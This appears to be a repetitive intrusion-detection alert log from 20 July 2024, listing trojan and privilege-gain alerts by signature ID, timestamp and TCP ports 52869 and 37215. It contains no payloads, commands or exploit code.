                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2027339
                      Source Port:35450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.511898
                      SID:2027339
                      Source Port:57892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2831300
                      Source Port:50212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2027339
                      Source Port:49488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.447173
                      SID:2829579
                      Source Port:52536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440253
                      SID:2831300
                      Source Port:57336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2829579
                      Source Port:37902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.771763
                      SID:2025132
                      Source Port:54246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.053184
                      SID:2025132
                      Source Port:57480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2027339
                      Source Port:33256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2829579
                      Source Port:49362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.214861
                      SID:2829579
                      Source Port:58786
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.165543
                      SID:2027339
                      Source Port:38202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.955473
                      SID:2027339
                      Source Port:34284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.207185
                      SID:2025132
                      Source Port:41982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.599613
                      SID:2831300
                      Source Port:59344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.420370
                      SID:2027339
                      Source Port:45966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.417625
                      SID:2025132
                      Source Port:52436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.181981
                      SID:2025132
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2027339
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2027339
                      Source Port:52716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:36724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:33124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413313
                      SID:2831300
                      Source Port:52128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2025132
                      Source Port:36634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.224363
                      SID:2025132
                      Source Port:60498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2027339
                      Source Port:34574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:39400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.774187
                      SID:2027339
                      Source Port:41052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.452056
                      SID:2027339
                      Source Port:45688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2835222
                      Source Port:50618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.615698
                      SID:2025132
                      Source Port:34622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.511430
                      SID:2027339
                      Source Port:47820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.113186
                      SID:2831300
                      Source Port:36162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:58088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.438133
                      SID:2027339
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.223856
                      SID:2025132
                      Source Port:39922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2831300
                      Source Port:37724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.632747
                      SID:2831300
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.520621
                      SID:2027339
                      Source Port:40514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:58174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2027339
                      Source Port:45472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2831300
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2025132
                      Source Port:57884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.954738
                      SID:2831300
                      Source Port:42634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.383849
                      SID:2835222
                      Source Port:39464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.767606
                      SID:2831300
                      Source Port:53696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2829579
                      Source Port:51626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.405121
                      SID:2835222
                      Source Port:49692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.313425
                      SID:2027339
                      Source Port:58320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.892457
                      SID:2027339
                      Source Port:57146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:40440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330643
                      SID:2027339
                      Source Port:43558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.288760
                      SID:2027339
                      Source Port:34158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:51250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.776991
                      SID:2831300
                      Source Port:58934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:44044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2835222
                      Source Port:35542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.636140
                      SID:2025132
                      Source Port:53482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.525153
                      SID:2831300
                      Source Port:54732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.111519
                      SID:2027339
                      Source Port:54508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.719355
                      SID:2829579
                      Source Port:36060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.219796
                      SID:2025132
                      Source Port:60276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.903540
                      SID:2027339
                      Source Port:33934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2831300
                      Source Port:38142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.549014
                      SID:2027339
                      Source Port:59894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.615596
                      SID:2027339
                      Source Port:47056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.893173
                      SID:2025132
                      Source Port:58466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.915135
                      SID:2025132
                      Source Port:38260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2027339
                      Source Port:58988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.066314
                      SID:2831300
                      Source Port:46558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:34.551915
                      SID:2027339
                      Source Port:52730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.139544
                      SID:2025132
                      Source Port:58666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.420492
                      SID:2027339
                      Source Port:47080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2835222
                      Source Port:41114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827023
                      SID:2835222
                      Source Port:48590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2835222
                      Source Port:59104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.934535
                      SID:2025132
                      Source Port:49924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2027339
                      Source Port:50870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2027339
                      Source Port:44684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.248816
                      SID:2025132
                      Source Port:42284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.536315
                      SID:2025132
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.887085
                      SID:2027339
                      Source Port:32890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.998391
                      SID:2027339
                      Source Port:60850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.072385
                      SID:2025132
                      Source Port:54358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.644646
                      SID:2025132
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.974244
                      SID:2027339
                      Source Port:39898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.620447
                      SID:2027339
                      Source Port:53290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2829579
                      Source Port:41588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.473173
                      SID:2027339
                      Source Port:59588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.340010
                      SID:2027339
                      Source Port:57194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119354
                      SID:2025132
                      Source Port:52556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2831300
                      Source Port:49570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.685490
                      SID:2025132
                      Source Port:56868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.305121
                      SID:2025132
                      Source Port:60950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.164914
                      SID:2027339
                      Source Port:42972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939890
                      SID:2835222
                      Source Port:53906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.755466
                      SID:2027339
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.766400
                      SID:2025132
                      Source Port:58292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2025132
                      Source Port:49258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:33088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.771029
                      SID:2027339
                      Source Port:43110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.433724
                      SID:2027339
                      Source Port:56500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.997704
                      SID:2025132
                      Source Port:37082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:23.347168
                      SID:2027339
                      Source Port:35948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:55014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:39246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.014484
                      SID:2831300
                      Source Port:59816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:46962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.965423
                      SID:2027339
                      Source Port:44910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2829579
                      Source Port:54330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324561
                      SID:2027339
                      Source Port:54024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.121390
                      SID:2025132
                      Source Port:44654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324524
                      SID:2829579
                      Source Port:38498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.271056
                      SID:2025132
                      Source Port:37084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.014311
                      SID:2829579
                      Source Port:54374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.537505
                      SID:2025132
                      Source Port:42258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.893151
                      SID:2025132
                      Source Port:32798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.467179
                      SID:2027339
                      Source Port:56310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.264642
                      SID:2025132
                      Source Port:59344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2829579
                      Source Port:39522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:57346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2835222
                      Source Port:57262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2027339
                      Source Port:44366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:47244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017539
                      SID:2027339
                      Source Port:55024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.296826
                      SID:2027339
                      Source Port:54696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2829579
                      Source Port:53544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2025132
                      Source Port:56012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.587933
                      SID:2025132
                      Source Port:47874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086217
                      SID:2829579
                      Source Port:45350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2829579
                      Source Port:42998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.417792
                      SID:2027339
                      Source Port:33396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:57362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.078168
                      SID:2025132
                      Source Port:43772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.610819
                      SID:2027339
                      Source Port:40172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.581565
                      SID:2831300
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:56092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.479241
                      SID:2027339
                      Source Port:59484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.483001
                      SID:2027339
                      Source Port:34668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2831300
                      Source Port:35646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2025132
                      Source Port:59364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.093469
                      SID:2027339
                      Source Port:38474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2027339
                      Source Port:45096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.809385
                      SID:2831300
                      Source Port:40522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.368197
                      SID:2027339
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2027339
                      Source Port:55006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.156324
                      SID:2027339
                      Source Port:55580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.867545
                      SID:2027339
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:34976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.695131
                      SID:2027339
                      Source Port:50944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.488878
                      SID:2027339
                      Source Port:40940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.018252
                      SID:2027339
                      Source Port:59512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.833146
                      SID:2025132
                      Source Port:47204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.933433
                      SID:2829579
                      Source Port:58102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2831300
                      Source Port:43394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.933433
                      SID:2829579
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.332387
                      SID:2829579
                      Source Port:37796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2831300
                      Source Port:45000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2829579
                      Source Port:56294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.345649
                      SID:2829579
                      Source Port:36392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.984660
                      SID:2025132
                      Source Port:51872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2831300
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2831300
                      Source Port:57888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.614211
                      SID:2025132
                      Source Port:34954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.974243
                      SID:2025132
                      Source Port:50988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.835422
                      SID:2025132
                      Source Port:43314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2027339
                      Source Port:35734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.098403
                      SID:2027339
                      Source Port:56168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.618622
                      SID:2025132
                      Source Port:33728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2831300
                      Source Port:33584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2025132
                      Source Port:48186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2831300
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2835222
                      Source Port:33150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:41548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:40912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.352260
                      SID:2027339
                      Source Port:42726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:34564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.647017
                      SID:2027339
                      Source Port:38378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2835222
                      Source Port:45582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
